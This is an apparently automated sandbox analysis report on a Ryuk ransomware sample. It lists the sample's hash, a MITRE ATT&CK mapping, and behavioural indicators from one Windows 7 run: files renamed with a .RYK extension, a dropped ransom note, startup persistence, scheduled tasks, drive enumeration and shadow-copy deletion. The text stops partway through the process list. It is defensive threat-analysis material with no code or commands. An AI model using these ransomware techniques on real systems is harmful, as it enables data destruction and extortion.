Malware Analysis Report

2024-08-06 09:28

Sample ID 230309-w52hxabc8y
Target Ryuk86.bin.exe
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
Tags
ryuk discovery evasion ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc

Threat Level: Known bad

The file Ryuk86.bin.exe was found to be: Known bad.

Malicious Activity Summary

ryuk discovery evasion ransomware

Ryuk

Deletes shadow copies

Disables Task Manager via registry modification

Drops startup file

Modifies file permissions

Checks computer location settings

Enumerates connected drives

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Kills process with taskkill

Uses Volume Shadow Copy service COM API

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Opens file in notepad (likely ransom note)

Runs net.exe

Modifies registry class

Creates scheduled task(s)

MITRE ATT&CK Matrix V6

Initial Access
TA0001
Execution
TA0002
Scheduled Task
T1053
Persistence
TA0003
Scheduled Task
T1053
Hidden Files and Directories
T1158
Privilege Escalation
TA0004
Scheduled Task
T1053
Defense Evasion
TA0005
File Permissions Modification
T1222
Hidden Files and Directories
T1158
File Deletion
T1107
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Inhibit System Recovery
T1490

Analysis: static1

Detonation Overview

Reported

2023-03-09 18:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-03-09 18:31

Reported

2023-03-09 18:33

Platform

win7-20230220-en

Max time kernel

47s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"

Signatures

Ryuk

ransomware ryuk

Disables Task Manager via registry modification

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS_COL.HXT.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR7B.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cancun.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15018_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Earthy.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\JUNGLE.HTM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\bdcmetadataresource.xsd.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00167_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01139_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\MST.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00524_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107134.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21504_.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0089992.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cairo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107516.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\THOCRAPI.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXEV.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ADVCMP.DIC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.JP.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.POC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01183_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00274_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOXMLED.EXE.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0216858.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\messageboxalert.ico.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107526.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00320_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\QUAD\THMBNAIL.PNG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106146.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02369_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALNDR98.POC.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239975.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00286_.WMF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSCOL11.INF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1348 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1468 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1468 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1468 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1468 wrote to memory of 932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1348 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 568 wrote to memory of 968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 568 wrote to memory of 968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 568 wrote to memory of 968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 568 wrote to memory of 968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1348 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 472 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 472 wrote to memory of 1328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 472 wrote to memory of 1328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 472 wrote to memory of 1328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 472 wrote to memory of 1328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1348 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 268 wrote to memory of 524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 268 wrote to memory of 524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 268 wrote to memory of 524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 268 wrote to memory of 524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
